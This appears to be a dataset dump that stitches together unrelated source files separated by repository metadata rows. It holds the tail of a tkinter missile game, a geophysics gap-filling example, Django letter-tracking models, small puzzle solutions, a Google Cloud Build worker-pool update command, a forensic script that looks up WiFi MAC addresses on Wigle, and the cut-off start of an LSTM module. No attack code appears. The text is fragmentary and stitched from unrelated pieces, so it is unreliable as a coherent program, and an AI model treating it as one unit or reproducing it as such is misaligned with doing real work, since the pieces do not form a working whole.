# Frame counter and missile list used by animate(); start the loop.
c.count = 0
missiles = []
animate()
def launch_missile(event):
    """Create a missile polygon at the launch pad and register the click
    position as its target for animate() to fly toward."""
    missile = c.create_polygon(
        250,450, 245,455, 245,480, 240,485, 240,495, 245,490, 245,480, 245,490,
        255,490, 255,480, 255,490, 260,495, 260,485, 255,480, 255,455,
        fill='white', outline='black', width=3,
    )
    missiles.append([event.x, event.y, missile])
# Left mouse button fires a missile at the clicked point.
c.bind('<Button-1>', launch_missile)
mainloop()
| [
"[email protected]"
] | |
798b7d8a6302939a34469359265942e49b7adc81 | 9839b73a6c09ac8a110feb692ef0c001d93f8cbf | /examples/advanced/preprocessGapFill.py | fddd2531aa700c42c6ca76aff7b6d658df654398 | [
"MIT"
] | permissive | GeoMTMan/resistics | c253caa9a70295a462756625261f93349475908f | 942afe45456f63657267020749d723f7eee89934 | refs/heads/master | 2020-08-01T10:25:12.535890 | 2019-09-25T23:36:39 | 2019-09-25T23:36:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,255 | py | from pathlib import Path
from resistics.project.projectIO import loadProject
projectPath = Path("preprocessProject")
proj = loadProject(projectPath)
proj.printInfo()
from resistics.utilities.utilsPlotter import plotOptionsTime, getPresentationFonts
plotOptions = plotOptionsTime(plotfonts=getPresentationFonts())
from resistics.ioHandlers.dataReaderATS import DataReaderATS
site1 = proj.getSiteData("site1")
readerATS = DataReaderATS(site1.getMeasurementTimePath("meas_2012-02-10_11-05-00"))
# headers of recording
headers = readerATS.getHeaders()
chanHeaders, chanMap = readerATS.getChanHeaders()
# separate out two datasets
timeOriginal1 = readerATS.getPhysicalData(
"2012-02-10 11:05:00", "2012-02-10 11:09:00", remaverage=False
)
timeOriginal2 = readerATS.getPhysicalData(
"2012-02-10 11:10:00", "2012-02-10 11:14:00", remaverage=False
)
from resistics.ioHandlers.dataWriterInternal import DataWriterInternal
# create a new site
proj.createSite("site1_gaps")
proj.refresh()
writer = DataWriterInternal()
writer.setOutPath(
Path(proj.timePath, "site1_gaps", "meas_2012-02-10_11-05-00_section1")
)
writer.writeData(headers, chanHeaders, timeOriginal1, physical=True)
writer.setOutPath(
Path(proj.timePath, "site1_gaps", "meas_2012-02-10_11-05-00_section2")
)
writer.writeData(headers, chanHeaders, timeOriginal2, physical=True)
from resistics.project.projectTime import viewTime
# now view time
fig = viewTime(
proj,
"2012-02-10 11:05:00",
"2012-02-10 11:14:00",
sites=["site1", "site1_gaps"],
filter={"lpfilt": 16},
chans=["Ex", "Hy"],
show=False,
plotoptions=plotOptions,
)
fig.savefig(Path(proj.imagePath, "viewTimeGaps.png"))
from resistics.ioHandlers.dataReaderInternal import DataReaderInternal
siteGaps = proj.getSiteData("site1_gaps")
readerSection1 = DataReaderInternal(
siteGaps.getMeasurementTimePath("meas_2012-02-10_11-05-00_section1")
)
timeData1 = readerSection1.getPhysicalSamples(remaverage=False)
timeData1.printInfo()
readerSection2 = DataReaderInternal(
siteGaps.getMeasurementTimePath("meas_2012-02-10_11-05-00_section2")
)
timeData2 = readerSection2.getPhysicalSamples(remaverage=False)
timeData2.printInfo()
from resistics.utilities.utilsInterp import fillGap
timeDataFilled = fillGap(timeData1, timeData2)
timeDataFilled.printInfo()
samplesToView = 14 * 60 * 4096
fig = timeDataFilled.view(sampleStop=samplesToView, chans=["Ex", "Hy"])
fig.savefig(Path(proj.imagePath, "timeDataFilled.png"))
# create a new site to write out to
proj.createSite("site1_filled")
proj.refresh()
# use channel headers from one of the datasets, stop date will be automatically amended
writer = DataWriterInternal()
writer.setOutPath(
Path(proj.timePath, "site1_filled", "meas_2012-02-10_11-05-00_filled")
)
headers = readerSection1.getHeaders()
chanHeaders, chanMap = readerSection1.getChanHeaders()
writer.writeData(headers, chanHeaders, timeDataFilled, physical=True)
proj.refresh()
# now view time
fig = viewTime(
proj,
"2012-02-10 11:05:00",
"2012-02-10 11:14:00",
sites=["site1", "site1_filled"],
filter={"lpfilt": 16},
chans=["Ex", "Hy"],
show=False,
plotoptions=plotOptions,
)
fig.savefig(Path(proj.imagePath, "viewTimeGapsFilled.png")) | [
"[email protected]"
] | |
55a42b6ae85147bc6d3fec90d6653672efb28b4e | 3ae38471ca4ff70e30d8eeb0508b9b0aab5e19a2 | /web/models.py | c7e701ae4777b6eeb1dcdcbf6d7c130c9268d9b0 | [] | no_license | Hamidnet220/Chapar | 5596d6b703aa4c01c1010f0067cde5a57c33e336 | 3654601f34f0c58a17813851448889ccbf2c1c90 | refs/heads/master | 2020-05-03T04:22:51.140098 | 2019-04-02T05:15:50 | 2019-04-02T05:15:50 | 178,419,739 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,502 | py | from django.db import models
from django.core.exceptions import ValidationError
from django.contrib.auth.admin import User
# Create your models here.
def empty_validate_event(value):
    """Field validator: reject values of two characters or fewer.

    Despite the name, the check is stricter than "non-empty" — any value
    shorter than three characters raises a ValidationError.
    """
    if len(value) > 2:
        return
    raise ValidationError(("You can not leave this field empty!"),params={'value':value},)
class Organization(models.Model):
    """A correspondent organization that mail is received from or sent to."""
    # User who created this record.
    add_by_usr = models.ForeignKey(User,on_delete=models.CASCADE,related_name='add_by_usr_org')
    title = models.CharField(max_length = 150,validators=[empty_validate_event])
    tel = models.CharField(max_length = 19,blank=True)
    fax = models.CharField(max_length = 19,blank=True)
    # Soft-delete flag: rows are marked deleted rather than removed.
    is_deleted = models.BooleanField(default=False)
    # User who soft-deleted the record, if any.
    del_by_usr = models.ForeignKey(User,blank=True,null=True,on_delete=models.SET_NULL,related_name='del_by_usr_org')
    def __str__(self):
        return self.title
class Recive(models.Model):
    """An incoming (received) letter.

    NOTE(review): the class name is a typo for "Receive", but renaming it
    would require a schema migration and caller updates.
    """
    # User who registered the letter.
    add_by_usr = models.ForeignKey(User,on_delete=models.CASCADE,related_name='add_by_usr')
    # Sender organization; kept (as NULL) if the organization is deleted.
    organization = models.ForeignKey(Organization,on_delete=models.SET_NULL,null=True)
    title = models.CharField(max_length = 150,validators=[empty_validate_event])
    summery = models.TextField(blank=True)
    recive_date = models.DateTimeField()
    recive_number= models.CharField(max_length = 150)
    description = models.TextField(blank=True,null=True)
    # Scanned copy of the received letter.
    recive_file = models.FileField(upload_to='recives')
    # Soft-delete flag: rows are marked deleted rather than removed.
    is_deleted = models.BooleanField(default=False)
    # User who soft-deleted the record, if any.
    del_by_usr = models.ForeignKey(User,blank=True,null=True,on_delete=models.SET_NULL,related_name='del_by_usr')
    def __str__(self):
        return "{}-{}".format(self.title,self.recive_date)
class Send(models.Model):
    """An outgoing (sent) letter; mirrors the fields of Recive."""
    # User who registered the letter.
    add_by_usr = models.ForeignKey(User,on_delete=models.CASCADE,related_name='add_by_usr_send')
    # Recipient organization; kept (as NULL) if the organization is deleted.
    organization = models.ForeignKey(Organization,on_delete=models.SET_NULL,null=True)
    title = models.CharField(max_length = 150,validators=[empty_validate_event])
    summery = models.TextField(blank=True)
    send_date = models.DateTimeField()
    send_number = models.CharField(max_length = 150)
    description = models.TextField(blank=True,null=True)
    # Scanned copy of the sent letter.
    send_file = models.FileField(upload_to='sends')
    # Soft-delete flag: rows are marked deleted rather than removed.
    is_deleted = models.BooleanField(default=False)
    # User who soft-deleted the record, if any.
    del_by_usr = models.ForeignKey(User,blank=True,null=True,on_delete=models.SET_NULL,related_name='del_by_usr_send')
    def __str__(self):
        return "{}-{}".format(self.title,self.send_date)
| [
"[email protected]"
] | |
187fddd67774c914ce223c7045ba7f5c7c4549d1 | 86cc17a69213569af670faed7ad531cb599b960d | /playeer38.py | 429d4c4e3d64f9d3acb3095ca8e5794d9b54fa00 | [] | no_license | LakshmikanthRavi/guvi-lux | ed1c389e27a9ec62e0fd75c140322563f68d311a | 5c29f73903aa9adb6484c76103edf18ac165259e | refs/heads/master | 2020-04-15T05:07:19.743874 | 2019-08-13T08:53:00 | 2019-08-13T08:53:00 | 164,409,489 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 102 | py | v=int(input())
# Collect the even divisors of v (read from stdin above) in ascending order
# and print them space-separated.
li = [i for i in range(2, v + 1, 2) if v % i == 0]
print(*li)
| [
"[email protected]"
] | |
9a18da4e47bb28850eb94b19cf46de0c7858bff1 | 008c065391d766fec2f2af252dd8a5e9bf5cb815 | /Compress the Lis.py | 177600548b994ba7e7b61511e9f4aed3f2340214 | [] | no_license | 22Rahul22/Codechef | b261ab43ff5ff64648a75ad1195e33cac2cfec52 | 1f645c779a250a71d75598e1eabad7e52dd6b031 | refs/heads/master | 2022-11-29T21:51:09.578798 | 2020-08-19T06:20:23 | 2020-08-19T06:20:23 | 288,650,009 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 625 | py | t = int(input())
# Codechef "Compress the List": for each of the `t` test cases (t is read from
# stdin above), print the array with every run of 3+ consecutive increasing
# integers collapsed to "first...last".
for _ in range(t):
    n = int(input())
    arr = list(map(int, input().split()))
    c = 0          # length of the current run of +1 increments
    a = []         # flat list of (start, end) index pairs of collapsed runs
    s = ""
    j = 0          # read cursor into `a`, advanced in pairs
    arr.append(0)  # sentinel so arr[i + 1] is always valid below
    for i in range(n):
        if arr[i] + 1 == arr[i + 1]:
            c += 1
        else:
            if c >= 2:
                # Run of at least three consecutive values: emit "a...b".
                a.append(i - c)
                a.append(i)
                s += str(arr[a[j]]) + "..." + str(arr[a[j + 1]]) + ","
                j += 2
            elif c == 1:
                # Exactly two consecutive values are printed individually.
                s += str(arr[i - 1]) + "," + str(arr[i]) + ","
            else:
                s += str(arr[i]) + ","
            c = 0
    # Drop the trailing comma before printing.
    print(s[:-1])
"[email protected]"
] | |
afec6ff7cb948c37315e39f43f5cc45300ea961e | bc9f66258575dd5c8f36f5ad3d9dfdcb3670897d | /lib/surface/builds/worker_pools/update.py | 903d79a17921d38c35943f2dfa7934dd354f2143 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | google-cloud-sdk-unofficial/google-cloud-sdk | 05fbb473d629195f25887fc5bfaa712f2cbc0a24 | 392abf004b16203030e6efd2f0af24db7c8d669e | refs/heads/master | 2023-08-31T05:40:41.317697 | 2023-08-23T18:23:16 | 2023-08-23T18:23:16 | 335,182,594 | 9 | 2 | NOASSERTION | 2022-10-29T20:49:13 | 2021-02-02T05:47:30 | Python | UTF-8 | Python | false | false | 12,000 | py | # -*- coding: utf-8 -*- #
# Copyright 2018 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Update worker pool command."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.cloudbuild import cloudbuild_exceptions
from googlecloudsdk.api_lib.cloudbuild import cloudbuild_util
from googlecloudsdk.api_lib.cloudbuild import workerpool_config
from googlecloudsdk.api_lib.compute import utils as compute_utils
from googlecloudsdk.api_lib.util import waiter
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.cloudbuild import workerpool_flags
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
from googlecloudsdk.core import resources
@base.ReleaseTracks(base.ReleaseTrack.GA)
class Update(base.UpdateCommand):
  """Update a worker pool used by Google Cloud Build."""
  # Rendered by the gcloud help system; {command} and {description} are
  # expanded at runtime.
  detailed_help = {
      'DESCRIPTION':
          '{description}',
      'EXAMPLES':
          """\
          To change the machine type and disk size of workers in a worker pool named wp1, run:
            $ {command} wp1 --region=us-central1 \
                --worker-machine-type=e2-standard-2 \
                --worker-disk-size=64GB
          """,
  }
  @staticmethod
  def Args(parser):
    """Register flags for this command.
    Args:
      parser: An argparse.ArgumentParser-like object. It is mocked out in order
        to capture some information, but behaves like an ArgumentParser.
    """
    parser = workerpool_flags.AddWorkerpoolUpdateArgs(parser,
                                                      base.ReleaseTrack.GA)
    parser.display_info.AddFormat("""
          table(
            name.segment(-1),
            createTime.date('%Y-%m-%dT%H:%M:%S%Oz', undefined='-'),
            state
          )
        """)
  def Run(self, args):
    """This is what gets called when the user runs this command.
    Args:
      args: an argparse namespace. All the arguments that were provided to this
        command invocation.
    Returns:
      Some value that we want to have printed later.
    """
    wp_name = args.WORKER_POOL
    wp_region = args.region
    release_track = self.ReleaseTrack()
    client = cloudbuild_util.GetClientInstance(release_track)
    messages = cloudbuild_util.GetMessagesModule(release_track)
    parent = properties.VALUES.core.project.Get(required=True)
    # Get the workerpool proto from either the flags or the specified file.
    wp = messages.WorkerPool()
    if args.config_from_file is not None:
      try:
        wp = workerpool_config.LoadWorkerpoolConfigFromPath(
            args.config_from_file, messages)
        # Don't allow a worker pool config for hybrid pools in any other
        # track but alpha.
        if release_track != base.ReleaseTrack.ALPHA:
          if wp.hybridPoolConfig is not None:
            raise cloudbuild_exceptions.HybridNonAlphaConfigError
      except cloudbuild_exceptions.ParseProtoException as err:
        log.err.Print('\nFailed to parse configuration from file.\n')
        raise err
    else:
      # Build the pool configuration from individual flags instead.
      wp.privatePoolV1Config = messages.PrivatePoolV1Config()
      worker_config = messages.WorkerConfig()
      if args.worker_machine_type is not None:
        worker_config.machineType = args.worker_machine_type
      if args.worker_disk_size is not None:
        worker_config.diskSizeGb = compute_utils.BytesToGb(
            args.worker_disk_size)
      wp.privatePoolV1Config.workerConfig = worker_config
      private_worker_network_config = messages.NetworkConfig()
      # All of the egress flags are mutually exclusive with each other.
      if args.no_public_egress or (release_track == base.ReleaseTrack.GA and
                                   args.no_external_ip):
        private_worker_network_config.egressOption = messages.NetworkConfig.EgressOptionValueValuesEnum.NO_PUBLIC_EGRESS
      if args.public_egress:
        private_worker_network_config.egressOption = messages.NetworkConfig.EgressOptionValueValuesEnum.PUBLIC_EGRESS
      wp.privatePoolV1Config.networkConfig = private_worker_network_config
    # Get the workerpool ref
    wp_resource = resources.REGISTRY.Parse(
        None,
        collection='cloudbuild.projects.locations.workerPools',
        api_version=cloudbuild_util.RELEASE_TRACK_TO_API_VERSION[release_track],
        params={
            'projectsId': parent,
            'locationsId': wp_region,
            'workerPoolsId': wp_name,
        })
    # Only fields present in wp are included in the patch mask, so unset
    # flags leave the existing pool configuration untouched.
    update_mask = cloudbuild_util.MessageToFieldPaths(wp)
    req = messages.CloudbuildProjectsLocationsWorkerPoolsPatchRequest(
        name=wp_resource.RelativeName(),
        workerPool=wp,
        updateMask=','.join(update_mask))
    # Send the Update request
    updated_op = client.projects_locations_workerPools.Patch(req)
    # Patch is asynchronous: block until the returned operation completes.
    op_resource = resources.REGISTRY.ParseRelativeName(
        updated_op.name, collection='cloudbuild.projects.locations.operations')
    updated_wp = waiter.WaitFor(
        waiter.CloudOperationPoller(client.projects_locations_workerPools,
                                    client.projects_locations_operations),
        op_resource, 'Updating worker pool')
    log.UpdatedResource(wp_resource)
    return updated_wp
@base.ReleaseTracks(base.ReleaseTrack.BETA)
class UpdateBeta(Update):
  """Update a worker pool used by Google Cloud Build."""
  # Inherits Run() from Update; only the registered flags and the output
  # table format differ (full resource name instead of the last segment).
  @staticmethod
  def Args(parser):
    """Register flags for this command.
    Args:
      parser: An argparse.ArgumentParser-like object. It is mocked out in order
        to capture some information, but behaves like an ArgumentParser.
    """
    parser = workerpool_flags.AddWorkerpoolUpdateArgs(parser,
                                                      base.ReleaseTrack.BETA)
    parser.display_info.AddFormat("""
          table(
            name,
            createTime.date('%Y-%m-%dT%H:%M:%S%Oz', undefined='-'),
            state
          )
        """)
@base.ReleaseTracks(base.ReleaseTrack.ALPHA)
class UpdateAlpha(Update):
  """Update a private or hybrid pool used by Google Cloud Build."""
  detailed_help = {
      'DESCRIPTION':
          '{description}',
      'EXAMPLES':
          """\
          * Private pools
          To change the machine type and disk size of a private pool named `pwp1`, run:
            $ {command} pwp1 --region=us-central1 --worker-machine-type=e2-standard-2 --worker-disk-size=64GB
          * Hybrid pools
          To change the default build disk size and default build vcpu count of a hybrid pool named `hwp1`, run:
            $ {command} hwp1 --region=us-west4 --default-build-disk-size=100GB --default-build-vcpu-count=3.5
          """,
  }
  @staticmethod
  def Args(parser):
    """Register flags for this command.
    Args:
      parser: An argparse.ArgumentParser-like object. It is mocked out in order
        to capture some information, but behaves like an ArgumentParser.
    """
    parser = workerpool_flags.AddWorkerpoolUpdateArgs(parser,
                                                      base.ReleaseTrack.ALPHA)
    parser.display_info.AddFormat("""
          table(
            name.segment(-1),
            createTime.date('%Y-%m-%dT%H:%M:%S%Oz', undefined='-'),
            state
          )
        """)
  def Run(self, args):
    """This is what gets called when the user runs this command.
    Args:
      args: an argparse namespace. All the arguments that were provided to this
        command invocation.
    Returns:
      Some value that we want to have printed later.
    """
    wp_name = args.WORKER_POOL
    wp_region = args.region
    release_track = self.ReleaseTrack()
    client = cloudbuild_util.GetClientInstance(release_track)
    messages = cloudbuild_util.GetMessagesModule(release_track)
    parent = properties.VALUES.core.project.Get(required=True)
    # Get the workerpool proto from either the flags or the specified file.
    wp = messages.WorkerPool()
    if args.config_from_file is not None:
      try:
        wp = workerpool_config.LoadWorkerpoolConfigFromPath(
            args.config_from_file, messages)
      except cloudbuild_exceptions.ParseProtoException as err:
        log.err.Print('\nFailed to parse configuration from file. If you'
                      ' were a Beta user, note that the format for this'
                      ' file has changed slightly for GA.\n')
        raise err
    else:
      private_worker_config = messages.WorkerConfig()
      if args.worker_machine_type is not None:
        private_worker_config.machineType = args.worker_machine_type
      if args.worker_disk_size is not None:
        private_worker_config.diskSizeGb = compute_utils.BytesToGb(
            args.worker_disk_size)
      private_worker_network_config = messages.NetworkConfig()
      # All of the egress flags are mutually exclusive with each other.
      if args.no_public_egress or (release_track == base.ReleaseTrack.GA and
                                   args.no_external_ip):
        private_worker_network_config.egressOption = messages.NetworkConfig.EgressOptionValueValuesEnum.NO_PUBLIC_EGRESS
      if args.public_egress:
        private_worker_network_config.egressOption = messages.NetworkConfig.EgressOptionValueValuesEnum.PUBLIC_EGRESS
      # The private pool and hybrid pool flags are mutually exclusive
      hybrid_worker_config = messages.HybridWorkerConfig()
      if args.default_build_disk_size is not None:
        hybrid_worker_config.diskSizeGb = compute_utils.BytesToGb(
            args.default_build_disk_size)
      if args.default_build_memory is not None:
        hybrid_worker_config.memoryGb = compute_utils.BytesToGb(
            args.default_build_memory)
      if args.default_build_vcpu_count is not None:
        hybrid_worker_config.vcpuCount = args.default_build_vcpu_count
      # Presence of any hybrid flag selects a hybrid pool config; otherwise
      # fall back to a private pool config built from the flags above.
      if args.default_build_disk_size is not None or args.default_build_memory is not None or args.default_build_vcpu_count is not None:
        wp.hybridPoolConfig = messages.HybridPoolConfig()
        wp.hybridPoolConfig.defaultWorkerConfig = hybrid_worker_config
      else:
        wp.privatePoolV1Config = messages.PrivatePoolV1Config()
        wp.privatePoolV1Config.networkConfig = private_worker_network_config
        wp.privatePoolV1Config.workerConfig = private_worker_config
    # Get the workerpool ref
    wp_resource = resources.REGISTRY.Parse(
        None,
        collection='cloudbuild.projects.locations.workerPools',
        api_version=cloudbuild_util.RELEASE_TRACK_TO_API_VERSION[release_track],
        params={
            'projectsId': parent,
            'locationsId': wp_region,
            'workerPoolsId': wp_name,
        })
    # Only fields present in wp are included in the patch mask, so unset
    # flags leave the existing pool configuration untouched.
    update_mask = cloudbuild_util.MessageToFieldPaths(wp)
    req = messages.CloudbuildProjectsLocationsWorkerPoolsPatchRequest(
        name=wp_resource.RelativeName(),
        workerPool=wp,
        updateMask=','.join(update_mask))
    # Send the Update request
    updated_op = client.projects_locations_workerPools.Patch(req)
    # Patch is asynchronous: block until the returned operation completes.
    op_resource = resources.REGISTRY.ParseRelativeName(
        updated_op.name, collection='cloudbuild.projects.locations.operations')
    updated_wp = waiter.WaitFor(
        waiter.CloudOperationPoller(client.projects_locations_workerPools,
                                    client.projects_locations_operations),
        op_resource, 'Updating worker pool')
    log.UpdatedResource(wp_resource)
    return updated_wp
| [
"[email protected]"
] | |
2af7d3345e7878e5745045fa9d0cc15efba802d3 | 8e7e9aaf06fed4e5be52f61462a40539c55d0f76 | /Chapter03/wifi_lookup.py | 191b4060e6064134d820b48c18240f5a011382c0 | [] | no_license | CodedQuen/Python-Digital-Forensics-Cookbookk | 2809ed1680958250a139c22f8a33b5512b608d98 | f69e56d4f2f88e71a74dc538c7b3a934ee014369 | refs/heads/master | 2022-06-06T10:10:36.288517 | 2020-05-04T03:06:39 | 2020-05-04T03:06:39 | 261,067,063 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,612 | py | from __future__ import print_function
import argparse
import csv
import os
import sys
import xml.etree.ElementTree as ET
import requests
"""
MIT License
Copyright (c) 2017 Chapin Bryce, Preston Miller
Please share comments and questions at:
https://github.com/PythonForensics/PythonForensicsCookbook
or email [email protected]
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
__authors__ = ["Chapin Bryce", "Preston Miller"]
__date__ = 20170815
__description__ = "Wifi MAC Address lookup utility"
def main(in_file, out_csv, type, api_key):
    """Parse the input (XML report or MAC list) and run Wigle lookups."""
    # `type` comes from the -t flag and is either 'xml' or 'txt'.
    parsed = parse_xml(in_file) if type == 'xml' else parse_txt(in_file)
    query_wigle(parsed, out_csv, api_key)
def parse_xml(xml_file):
    """Parse a Cellebrite XML report and collect connected WiFi APs.

    Walks every "Location" model element, pairing the TimeStamp field with
    the BSSID/SSID extracted from the Description field of the same model.
    NOTE: assumes TimeStamp precedes Description within each model element,
    matching the Cellebrite report layout.

    Args:
        xml_file: Path to the Cellebrite XML report.

    Returns:
        Dict keyed by BSSID; each value holds parallel "Timestamps" and
        "SSID" lists plus an empty "Wigle" dict filled in later.
    """
    wifi = {}
    xmlns = "{http://pa.cellebrite.com/report/2.0}"
    print("[+] Opening {} report".format(xml_file))
    xml_tree = ET.parse(xml_file)
    print("[+] Parsing report for all connected WiFi addresses")
    root = xml_tree.getroot()
    for child in root.iter():
        if child.tag == xmlns + "model" and child.get("type") == "Location":
            for field in child.findall(xmlns + "field"):
                if field.get("name") == "TimeStamp":
                    ts_value = field.find(xmlns + "value")
                    if ts_value is None:
                        continue
                    # Remember the timestamp for the Description that follows.
                    ts = ts_value.text
                elif field.get("name") == "Description":
                    value = field.find(xmlns + "value")
                    # Skip Description fields with no (or empty) <value>;
                    # the original crashed with a TypeError on empty values.
                    if value is None or value.text is None:
                        continue
                    if "SSID" in value.text:
                        # Description format: "BSSID: <mac>\tSSID: <name>".
                        bssid, ssid = value.text.split("\t")
                        bssid = bssid[7:]
                        ssid = ssid[6:]
                        if bssid in wifi:
                            wifi[bssid]["Timestamps"].append(ts)
                            wifi[bssid]["SSID"].append(ssid)
                        else:
                            wifi[bssid] = {
                                "Timestamps": [ts], "SSID": [ssid],
                                "Wigle": {}}
    return wifi
def parse_txt(txt_file):
    """Read one MAC address per line and seed the lookup dictionary."""
    print("[+] Extracting MAC addresses from {}".format(txt_file))
    with open(txt_file) as mac_file:
        # Plain-text input carries no timestamps or SSIDs, so use "N/A".
        return {
            line.strip(): {"Timestamps": ["N/A"], "SSID": ["N/A"],
                           "Wigle": {}}
            for line in mac_file
        }
def query_mac_addr(mac_addr, api_key):
    """Query the Wigle v2 network-search API for a single BSSID.

    Args:
        mac_addr: BSSID (MAC address) of the access point to look up.
        api_key: Two-element sequence of (API name, API token) used for
            HTTP basic auth.

    Returns:
        The decoded JSON response as a dict.
    """
    query_url = "https://api.wigle.net/api/v2/network/search?" \
                "onlymine=false&freenet=false&paynet=false" \
                "&netid={}".format(mac_addr)
    req = requests.get(query_url, auth=(api_key[0], api_key[1]))
    return req.json()
def query_wigle(wifi_dictionary, out_csv, api_key):
    """Look up every BSSID on Wigle, attach results in place, write the CSV.

    Args:
        wifi_dictionary: Dict keyed by BSSID as built by parse_xml/parse_txt;
            each entry's "Wigle" dict is populated here.
        out_csv: Path for the CSV report (passed through to prep_output).
        api_key: (API name, API token) pair for Wigle authentication.
    """
    print("[+] Querying Wigle.net through Python API for {} "
          "APs".format(len(wifi_dictionary)))
    for mac in wifi_dictionary:
        wigle_results = query_mac_addr(mac, api_key)
        try:
            # Assumes successful responses include "resultCount"; error
            # payloads omit it, which triggers the KeyError branch below.
            if wigle_results["resultCount"] == 0:
                wifi_dictionary[mac]["Wigle"]["results"] = []
                continue
            else:
                wifi_dictionary[mac]["Wigle"] = wigle_results
        except KeyError:
            if wigle_results["error"] == "too many queries today":
                # Daily quota exhausted: record an empty result and move on.
                print("[-] Wigle daily query limit exceeded")
                wifi_dictionary[mac]["Wigle"]["results"] = []
                continue
            else:
                print("[-] Other error encountered for "
                      "address {}: {}".format(mac, wigle_results['error']))
                wifi_dictionary[mac]["Wigle"]["results"] = []
                continue
    prep_output(out_csv, wifi_dictionary)
def prep_output(output, data):
    """Flatten the nested AP/Wigle data into one CSV row per Wigle result.

    Each row key is "<ap index>-<timestamp index>-<result index>", so every
    (AP, connection time, Wigle hit) combination gets its own row.
    """
    csv_data = {}
    google_map = "https://www.google.com/maps/search/"
    for x, mac in enumerate(data):
        for y, ts in enumerate(data[mac]["Timestamps"]):
            for z, result in enumerate(data[mac]["Wigle"]["results"]):
                shortres = data[mac]["Wigle"]["results"][z]
                # Build a Google Maps link from the trilaterated coordinates.
                g_map_url = "{}{},{}".format(
                    google_map, shortres["trilat"], shortres["trilong"])
                # Merge our metadata with the raw Wigle result fields; the
                # Wigle fields win on any key collision.
                csv_data["{}-{}-{}".format(x, y, z)] = {
                    **{
                        "BSSID": mac, "SSID": data[mac]["SSID"][y],
                        "Cellebrite Connection Time": ts,
                        "Google Map URL": g_map_url},
                    **shortres
                }
    write_csv(output, csv_data)
def write_csv(output, data):
    """Serialize *data* (a dict of row dicts) to a CSV file at *output*."""
    print("[+] Writing data to {}".format(output))
    # The union of all keys across rows becomes the (sorted) CSV header.
    columns = set()
    for record in data.values():
        columns.update(record)
    with open(output, "w", newline="") as csvfile:
        writer = csv.DictWriter(
            csvfile, fieldnames=sorted(columns), extrasaction='ignore')
        writer.writeheader()
        for record in data.values():
            writer.writerow(record)
if __name__ == "__main__":
    # Command-line Argument Parser
    parser = argparse.ArgumentParser(
        description=__description__,
        epilog="Developed by {} on {}".format(
            ", ".join(__authors__), __date__),
        formatter_class=argparse.ArgumentDefaultsHelpFormatter
    )
    parser.add_argument("INPUT_FILE", help="INPUT FILE with MAC Addresses")
    parser.add_argument("OUTPUT_CSV", help="Output CSV File")
    parser.add_argument(
        "-t", help="Input type: Cellebrite XML report or TXT file",
        choices=('xml', 'txt'), default="xml")
    # The API key file is expected to hold "name:token" on its first line.
    parser.add_argument('--api', help="Path to API key file",
                        default=os.path.expanduser("~/.wigle_api"),
                        type=argparse.FileType('r'))
    args = parser.parse_args()
    # Validate the input path before doing any work.
    if not os.path.exists(args.INPUT_FILE) or \
            not os.path.isfile(args.INPUT_FILE):
        print("[-] {} does not exist or is not a file".format(
            args.INPUT_FILE))
        sys.exit(1)
    # Create the output directory if needed ('' means the current directory).
    directory = os.path.dirname(args.OUTPUT_CSV)
    if directory != '' and not os.path.exists(directory):
        os.makedirs(directory)
    # Split "name:token" into the (user, key) pair used for Wigle auth.
    api_key = args.api.readline().strip().split(":")
    main(args.INPUT_FILE, args.OUTPUT_CSV, args.t, api_key)
| [
"[email protected]"
] | |
0445ea582c61d35c6eefd8882991e0c018529aec | 1e987bd8b8be0dc1c139fa6bf92e8229eb51da27 | /deeplearning/ml4pl/models/lstm/lstm_base.py | fa9d858d66086a49b8e14f77d5252d3ef5008e2b | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | tszdanger/phd | c97091b4f1d7712a836f0c8e3c6f819d53bd0dd5 | aab7f16bd1f3546f81e349fc6e2325fb17beb851 | refs/heads/master | 2023-01-01T00:54:20.136122 | 2020-10-21T18:07:42 | 2020-10-21T18:09:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,806 | py | # Copyright 2019-2020 the ProGraML authors.
#
# Contact Chris Cummins <[email protected]>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module defines the abstract base class for LSTM models."""
import io
import pathlib
import tempfile
from typing import Any
from typing import Callable
from typing import Iterable
from typing import List
from typing import Optional
from deeplearning.ml4pl.graphs.labelled import graph_database_reader
from deeplearning.ml4pl.graphs.labelled import graph_tuple_database
